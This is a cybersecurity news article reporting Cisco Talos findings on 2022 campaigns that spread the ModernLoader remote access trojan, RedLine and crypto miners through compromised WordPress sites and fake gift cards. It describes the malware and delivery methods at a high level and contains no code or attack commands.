Home > Cyber News > Unknown Threat Actor Drops ModernLoader, RedLine and Crypto Miners

Unknown Threat Actor Drops ModernLoader, RedLine and Crypto Miners

Unknown Threat Actor Drops ModernLoader, RedLine and Crypto Miners

ModernLoader is a new remote access trojan detected by Cisco Talos researchers.

ModernLoader Campaigns in the Wild

More specifically, the researchers analyzed three separate, but related campaigns in the period March-June 2022 that delivered ModernLoader, RedLine and several cryptocurrency miners.

In these attacks, the threat actors use PowerShell, .NET, and HTA (HTML Application) and VBS files, eventually deploying malware such as SystemBC and DCRAT. The final payload of the campaigns is the said ModernLoader remote access trojan capable of harvesting system information and deploying numerous modules.

“In the earlier campaigns from March, we also observed the attackers delivering the cryptocurrency mining malware XMRig. The March campaigns appeared to be targeting Eastern European users, as the constructor utility we analyzed had predefined script templates written in Bulgarian, Polish, Hungarian and Russian,” Cisco Talos explained.

ModernLoader provides remote access to targeted computers enabling further malicious operations such as dropping more malware, stealing information, and adding the target to a botnet. Due to the use of various off-the-shelf tools, the attack campaigns are attributed to a previously unknown threat actor, possibly of Russian origin, targeting Eastern Europe (Bulgaria, Poland, Hungary, and Russia).

This unknown threat actor is compromising vulnerable web WordPress and CPanel instances to drop the ModernLoader malware via fake Amazon gift cards. ModernLoader itself is a simple .NET remote access trojan that can collect system information, execute arbitrary commands, and download and run a file from the command-and-control server. Thanks to this capability, the threat actor can change the modules in real time.

It is also noteworthy that the threat actor “has an interest in alternative distribution channels such as compromised web applications, archive infections and spreading by using Discord webhooks.” Despite the versatile approaches and technical tactics, Cisco Talos estimates that the success of the analyzed campaigns is limited.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim

More Posts

Follow Me:

Leave a Comment

Your email address will not be published. Required fields are marked *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our Privacy Policy.
I Agree